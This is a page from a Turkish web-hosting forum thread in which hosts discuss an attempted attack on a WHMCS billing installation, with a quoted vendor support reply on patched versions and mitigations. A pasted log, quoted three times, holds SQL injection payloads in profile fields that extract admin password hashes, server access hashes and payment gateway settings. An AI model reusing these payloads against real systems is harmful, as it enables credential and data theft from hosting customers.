Yeni WHMCS Açığı - Hack Girişimleri - Sayfa 45

03-09-2014, 13:02:46

#397

by_error

PlusTeknoloji adlı üyeden alıntı: mesajı görüntüle

Hostbill'de tema çeşitliliği ve entegre olayları nasıl? Bunun ile uğraşan var mı forumda?

Skype:Axletm ekleyin gerekli açıklamaları yapayım

03-09-2014, 16:17:34

#398

muzafferbilisim

Misafir

su anda whmcs kurulu bir sisteme hack girişimi oldu üyelik değiştirme den işlem yapılıyor

First Name: 'sikat' to 'hacked'
Last Name: 'whm' to 'hacked'
Company Name: 'sikatwhm' to 'hacked'
Address 1: 'cilacap' to 'AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins)'
Address 2: '' to 'AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)'
City: 'cilacap' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0 d,accesshash SEPARATOR 0x0d) FROM tblservers),AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x0d,accesshash SEPARATOR 0x0d) FROM tblservers)'
State: 'Alabama' to 'AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a, configoption1 SEPARATOR 0x0d) FROM tblproducts),AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,message SEPARATOR 0x0d) FROM tblemails),AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,gateway,0x3a,setting,0x3a,val ue SEPARATOR 0x0d) FROM tblpaymentgateways)'
Postcode: '55555' to 'hacked'
Phone Number: '08885552228' to '1'
Default Payment Method: '' to ''

üyelik bilgileri değişiminden kişi bazı kodlar gönderdi
su anda ilgili sitenin admin paneline giriş yok hesabı kapattım direk whmcs ye bilgi verdim bakalım ne olacak

siteyi de askıya aldım direk yedekleri ilettim yeni bir saldırı ile karsı karsıyayız sanırım veya baska bir sorun var

03-09-2014, 23:22:20

#399

MahsumCelik

Mysql dışarı kapalı ve admın panelide two factor varsa yine tablo çekebiliyorlarmı ki ?

03-09-2014, 23:28:50

#400

AkilliHost

muzafferbilisim adlı üyeden alıntı: mesajı görüntüle

su anda whmcs kurulu bir sisteme hack girişimi oldu üyelik değiştirme den işlem yapılıyor

First Name: 'sikat' to 'hacked'
Last Name: 'whm' to 'hacked'
Company Name: 'sikatwhm' to 'hacked'
Address 1: 'cilacap' to 'AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins)'
Address 2: '' to 'AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)'
City: 'cilacap' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0 d,accesshash SEPARATOR 0x0d) FROM tblservers),AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x0d,accesshash SEPARATOR 0x0d) FROM tblservers)'
State: 'Alabama' to 'AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a, configoption1 SEPARATOR 0x0d) FROM tblproducts),AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,message SEPARATOR 0x0d) FROM tblemails),AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,gateway,0x3a,setting,0x3a,val ue SEPARATOR 0x0d) FROM tblpaymentgateways)'
Postcode: '55555' to 'hacked'
Phone Number: '08885552228' to '1'
Default Payment Method: '' to ''

üyelik bilgileri değişiminden kişi bazı kodlar gönderdi
su anda ilgili sitenin admin paneline giriş yok hesabı kapattım direk whmcs ye bilgi verdim bakalım ne olacak

siteyi de askıya aldım direk yedekleri ilettim yeni bir saldırı ile karsı karsıyayız sanırım veya baska bir sorun var

bugunde bize benzeri bir sipariş geldi, sorun yok

04-09-2014, 08:57:29

#401

muzafferbilisim

Misafir

verdikleri cevap

Hi *******,

Provided you have updated to at least version 5.2.8 or 5.1.10 prior to the attempts (5.2.17 or newer are recommended), your installation is protected from attacks of this nature. This does NOT however mean that you won't see attempts to use it. You may still see emails or log entries saying somebody tried to update or submit a value that starts with AES_ENCRYPT. If you see these, do not be alarmed.

If you do not see a client under the mentioned name in WHMCS, it is likely that the attacker created a fake account using the registration form (register.php) and changed the details since. You can disable client registrations without ordering (if desired) by disabling "Allow Client Registration" under Setup > General Setings > Other tab.

Please read the below if you are running an older version:

Based on the log entry you've provided, the attacker has only performed a SELECT statement. This particular statement exposes the administrator password hashes. These password hashes, in themselves, are not sufficient to allow the attacker to authenticate into your admin area. The attacker must find the text which equates to the same hash value as your password.

If the attacker is able to extract the true admin user password value, they would then need to also know the exact location of the admin login page as well as have access to load it. As described in our recommended further security steps, WHMCS provides an extra layer of protection to help mitigate the unauthorized access into the administrative area by allowing a custom admin folder path. We also recommend restricting IP access to that folder with an htaccess file.

If you require further assistance, please don't hesitate to let us know.

04-09-2014, 11:17:38

#402

Atakan_

SQL Injection 'dan başka birşey kalmadı zaten. Bunada güvenliğinizi two factor ile alabilirsiniz. Sıkıntı yok.

04-09-2014, 13:29:05

#403

Burti

Reveloper

muzafferbilisim adlı üyeden alıntı: mesajı görüntüle

su anda whmcs kurulu bir sisteme hack girişimi oldu üyelik değiştirme den işlem yapılıyor

First Name: 'sikat' to 'hacked'
Last Name: 'whm' to 'hacked'
Company Name: 'sikatwhm' to 'hacked'
Address 1: 'cilacap' to 'AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins)'
Address 2: '' to 'AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)'
City: 'cilacap' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0 d,accesshash SEPARATOR 0x0d) FROM tblservers),AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x0d,accesshash SEPARATOR 0x0d) FROM tblservers)'
State: 'Alabama' to 'AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a, configoption1 SEPARATOR 0x0d) FROM tblproducts),AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,message SEPARATOR 0x0d) FROM tblemails),AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,gateway,0x3a,setting,0x3a,val ue SEPARATOR 0x0d) FROM tblpaymentgateways)'
Postcode: '55555' to 'hacked'
Phone Number: '08885552228' to '1'
Default Payment Method: '' to ''

üyelik bilgileri değişiminden kişi bazı kodlar gönderdi
su anda ilgili sitenin admin paneline giriş yok hesabı kapattım direk whmcs ye bilgi verdim bakalım ne olacak

siteyi de askıya aldım direk yedekleri ilettim yeni bir saldırı ile karsı karsıyayız sanırım veya baska bir sorun var

Bu taa 5.2.8'deki açık:

http://blog.sucuri.net/2013/10/whmcs...-the-wild.html

06-09-2014, 14:46:02

#404

cPanels

Bugün bizim gibi sitelerinde yavaşlık sorunu yaşayan hosting firmaları nedenini merak ediyor diye paylaşmak istedim. Görüştüğüm bi kaç kişide de aynı problem var, Aktif SEO modülünü kullanan herkeste aynı problem var.

Modül'ün bağlı olduğu Aktiftema sunucusunda problem var, bu nedenle modül sorgusu timeouta uğruyor ve siteyi yavaşlatıyor. Modülü kapatırsanız muhtemelen Google'da gerilere düşülebilir. Bu yüzden sunucuda ki problemin düzelmesini sabırla bekliyoruz...

Edit: Sorun gün içinde düzeltildi.

06-09-2014, 14:56:34

#405

Yandas

cPanels adlı üyeden alıntı: mesajı görüntüle

Bugün bizim gibi sitelerinde yavaşlık sorunu yaşayan hosting firmaları nedenini merak ediyor diye paylaşmak istedim. Görüştüğüm bi kaç kişide de aynı problem var, Aktif SEO modülünü kullanan herkeste aynı problem var.

Modül'ün bağlı olduğu Aktiftema sunucusunda problem var, bu nedenle modül sorgusu timeouta uğruyor ve siteyi yavaşlatıyor. Modülü kapatırsanız muhtemelen Google'da gerilere düşülebilir. Bu yüzden sunucuda ki problemin düzelmesini sabırla bekliyoruz...

Bu sorunu bir çok kez yaşadığımız için farklı bir modül kullanıyoruz. Özel mesaj ile iletiyorum.